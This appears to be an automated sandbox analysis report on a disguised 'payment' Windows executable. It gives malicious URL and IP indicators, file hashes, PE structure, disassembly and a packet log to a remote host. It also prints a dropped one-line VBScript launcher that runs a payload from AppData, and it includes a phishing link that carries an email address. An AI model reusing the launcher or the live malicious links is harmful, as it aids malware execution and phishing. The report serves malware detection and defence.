                                https://clickme.thryv.com/ls/click?upn=u001.5-2B1Zlj-2BwCegXqgd6Um7kY0JRT8UgUE3u1rWR4YFASxlUU28BkvglW4Sw74FAirirfRSk_jzclrAiO28PBUU1ZLf2yC1YJEF5Rt8zDnz4yKbEuFqXf3c0fVOhzL2fXxOYix3CjCrzlLwoIPSXb9PavK50mtpdK-2FWF7thydb3q6E5ptEQjRRfcuGnHeO06MZmpQ9Md6EqF3tHpTnJtwnRl07eBC-2BbeqGDZkqEsFQ9fh8CwKb92GLRs9xjA4K3L0qiP8u-2BrdM8wHoplpWV7e4Ic88yYySdEC6BFxZgKH7uN8ysaI5ELMcoW165-2BlUHwvAK7b88Y-2FPYUokK9PeBa-2FcZkvlS9nh3pVTeDrVNhWWvISMX1rFpeltySyG2xWyMwf0YLv9gS0X1AE0s7oDERqOcaTwfLsXQxoV99DX1bVNLU7d5FQCgc-3D#C?email=heath.teresa@aidb.orgGet hashmaliciousUnknownBrowse
                                • 31.170.162.164
                                la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                • 46.17.173.161
                                http://nemoinsure.comGet hashmaliciousUnknownBrowse
                                • 195.110.59.5
                                phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                • 31.170.162.164
                                I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msgGet hashmaliciousMint StealerBrowse
                                • 195.110.59.166
                                https://kunnskapsfilm.noGet hashmaliciousUnknownBrowse
                                • 45.93.125.64
                                https://ssintegra.com/Noel/webb/index.htmlGet hashmaliciousUnknownBrowse
                                • 212.1.210.77
                                https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yLGet hashmaliciousRattyBrowse
                                • 31.220.53.231
                                No context
                                No context
                                Process:C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1845544
                                Entropy (8bit):5.625794477334237
                                Encrypted:false
                                SSDEEP:24576:SIUT3GoAMU+DrPSD1DNqETFyuvc0Mr/QqAX9WLJFvIjzFB4Kac:B9FMFPeYET0uvoQp9WzAjzFBZ
                                MD5:622B4FB4E2D8E9A803F526A77C867590
                                SHA1:ECFAC03A1DE7CBEF3B10F0E73C251B77EDB63969
                                SHA-256:006C7725348C5FE7EF76CBCE10E36C8CC5BA01C484D1107F63A29768D11DCE86
                                SHA-512:CE0B562A070824BF92ECF77326DA12F7EEBF921C7912A71A0865CBE0FC37764A9B81B1974670BF2E36DD2D2853FAA7A642CA6C83B6A283A51E7E069728B7DC54
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 18%
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?.Rg.................^...........|... ........@.. .......................@............`.................................p|..K......................(/... ....................................................... ............... ..H............text....\... ...^.................. ..`.rsrc...............`..............@..@.reloc....... ......................@..B.................|......H...........(............................................................*...(....*..(....*..0.......... ........8........E............+...8)...s...... ....~....{2...:....& ....8......*...r...p(....o.... ....~....{U...:....& ....8........E....S...G.......y...V.............../...z...8N...........io...... ....8......o...... ....~....{....:....& ....8..... ........8y...8.... ....~....{....:d...& ....8Y...... ....8L....s....r3..ps....(....o...... ....~....{F...:....& ....8.......
                                Process:C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:[ZoneTransfer]....ZoneId=0
                                Process:C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):87
                                Entropy (8bit):4.706532548942545
                                Encrypted:false
                                SSDEEP:3:FER/n0eFHHoMERE2J5WGYTwVrn:FER/lFHIFi23WGYc
                                MD5:19D323C13A43D5871D5AC24D125B1207
                                SHA1:8ADD7CDCD2507F0E6F936130B455AB8DDA9E18F6
                                SHA-256:BFF935777CA5424C12093D472D1FB2AB9CA0487CFD29E6E17B46DD5C4F8A29A9
                                SHA-512:D92092643BD8B9F0305FAC0E85B02E5D98E97D9FEB67E1DBC89C6FAC17A3F4A63A5B4D285B7C814D3F7067DD0612372A264D52C0472453B0A39A40317E032206
                                Malicious:true
                                Reputation:low
                                Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Local\scriptcase-php8.exe"""
                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):5.625794477334237
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
                                File size:1'845'544 bytes
                                MD5:622b4fb4e2d8e9a803f526a77c867590
                                SHA1:ecfac03a1de7cbef3b10f0e73c251b77edb63969
                                SHA256:006c7725348c5fe7ef76cbce10e36c8cc5ba01c484d1107f63a29768d11dce86
                                SHA512:ce0b562a070824bf92ecf77326da12f7eebf921c7912a71a0865cbe0fc37764a9b81b1974670bf2e36dd2d2853faa7a642ca6c83b6a283a51e7e069728b7dc54
                                SSDEEP:24576:SIUT3GoAMU+DrPSD1DNqETFyuvc0Mr/QqAX9WLJFvIjzFB4Kac:B9FMFPeYET0uvoQp9WzAjzFBZ
                                TLSH:0685EA03BA9755B3C71C1F76C59E09144378E4B5A61BF21E364E332948837BAAACC17E
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?.Rg.................^...........|... ........@.. .......................@............`................................
                                Icon Hash:68609b9393166970
                                Entrypoint:0x597cbe
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x6752BD3F [Fri Dec 6 09:00:47 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                Signature Valid:false
                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                Signature Validation Error:The digital signature of the object did not verify
                                Error Number:-2146869232
                                Not Before, Not After
                                • 08/05/2024 02:00:00 14/05/2025 01:59:59
                                Subject Chain
                                • CN=Netmake Solucoes em Informatica Ltda, O=Netmake Solucoes em Informatica Ltda, L=Olinda, S=Pernambuco, C=BR, SERIALNUMBER=04.095.869/0001-18, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=BR
                                Version:3
                                Thumbprint MD5:C3709FC102AE6E39229F291ED57E3EAC
                                Thumbprint SHA-1:C36565B2558D1B285CCB07E23F195CB9BAFFDB78
                                Thumbprint SHA-256:19EB89E23F21F8A3EB355150F8D809456221C56F5BA55533BB6343E0328DEF95
                                Serial:09183158E703855D1080C1C20857A8EF
                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x197c700x4b.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1980000x296c8.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x1bfa000x2f28
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c20000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x195cc40x195e0006f7529a63ec5b4219d505ba631fb60dFalse0.3337148954804435data5.516033239507528IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0x1980000x296c80x29800ea66e8424e0a2cbc7bd27a85a95d22d1False0.09868575865963855data3.5742339084718826IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x1c20000xc0x200767d86f4278fc37c5178afdd7e6822ffFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0x1982b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5663 x 5663 px/m0.374113475177305
                                RT_ICON0x1987180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 5663 x 5663 px/m0.25
                                RT_ICON0x1990a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5663 x 5663 px/m0.18832082551594748
                                RT_ICON0x19a1480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5663 x 5663 px/m0.12334024896265561
                                RT_ICON0x19c6f00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5663 x 5663 px/m0.08862777515351913
                                RT_ICON0x1a09180x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 5663 x 5663 px/m0.07661737523105361
                                RT_ICON0x1a5da00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 5663 x 5663 px/m0.053552659239016184
                                RT_ICON0x1af2480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 5663 x 5663 px/m0.04034070744114516
                                RT_ICON0x1bfa700x169cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9208707671043538
                                RT_GROUP_ICON0x1c110c0x84data0.7272727272727273
                                RT_VERSION0x1c11900x34cdata0.41824644549763035
                                RT_MANIFEST0x1c14dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                DLLImport
                                mscoree.dll_CorExeMain
                                TimestampSource PortDest PortSource IPDest IP
                                Dec 6, 2024 11:05:29.339684010 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:29.460227966 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:29.460347891 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:29.461133957 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:29.580846071 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.698776007 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.698884964 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.698941946 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.698945999 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.698959112 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.698971987 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.699001074 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.699047089 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.699090004 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.699111938 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.699126005 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.699137926 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.699150085 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.699166059 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.699189901 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.820609093 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.822221041 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.822314024 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.826095104 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.880059004 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.890901089 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.891102076 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.891153097 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.895054102 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.895148993 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.895186901 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.901520967 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.901654005 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.901710033 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.910656929 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.910677910 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.910778046 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.918486118 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.918596983 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.918822050 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.926762104 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.926856995 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.926944971 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.935220957 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.935292006 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.935350895 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.943553925 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.943583012 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.943636894 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.951925039 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.951978922 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.952033997 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.960331917 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.960369110 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.960423946 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:30.999943972 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:30.999989033 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.000082016 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.004148006 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.051918983 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.082901955 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.082982063 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.083029985 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.085282087 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.085320950 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.085414886 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.088954926 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.089031935 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.089082956 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.093569994 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.093669891 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.093727112 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.098269939 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.098376989 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.098429918 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.102931976 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.103024006 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.103079081 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.107528925 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.107635975 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.107687950 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.112298965 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.112447023 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.112494946 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.116945028 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.117003918 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.117053032 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.121684074 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.121850014 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.123636961 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.126305103 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.126408100 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.126446962 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.130956888 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.131052017 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.131227970 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.135736942 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.135842085 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.135883093 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.140407085 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.140499115 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.143388033 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.145016909 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.145296097 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.145354033 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.149708033 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.149825096 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.149887085 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.154392958 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.154486895 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.154537916 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.159037113 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.159136057 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.159348011 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.163705111 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.163820982 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.163880110 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.168488979 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.168608904 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.168654919 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.173161030 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.173178911 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.173233986 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.177784920 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.177895069 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.178476095 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.202814102 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.255074978 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.274983883 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.275010109 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.275144100 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.276536942 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.276634932 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.276698112 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.281696081 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.281864882 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.281912088 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.282680988 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.282789946 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.282830954 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.289565086 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.290183067 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.290232897 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.290898085 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.291075945 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.291126013 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.293929100 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.294095039 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.294152021 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.296829939 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.297005892 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.297055006 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.299577951 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.299591064 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.299644947 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.302694082 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.302802086 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.302860022 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.305468082 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.305603981 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.305654049 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.308244944 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.308413982 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.308456898 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.311012030 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.311127901 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.311184883 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.312505960 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.312519073 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.312557936 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.314496994 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.314578056 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.314627886 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.318104982 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.318118095 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.318170071 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.319924116 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.319993019 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.320053101 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.322815895 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.322891951 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.322936058 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.325443029 CET804970845.9.191.182192.168.2.10
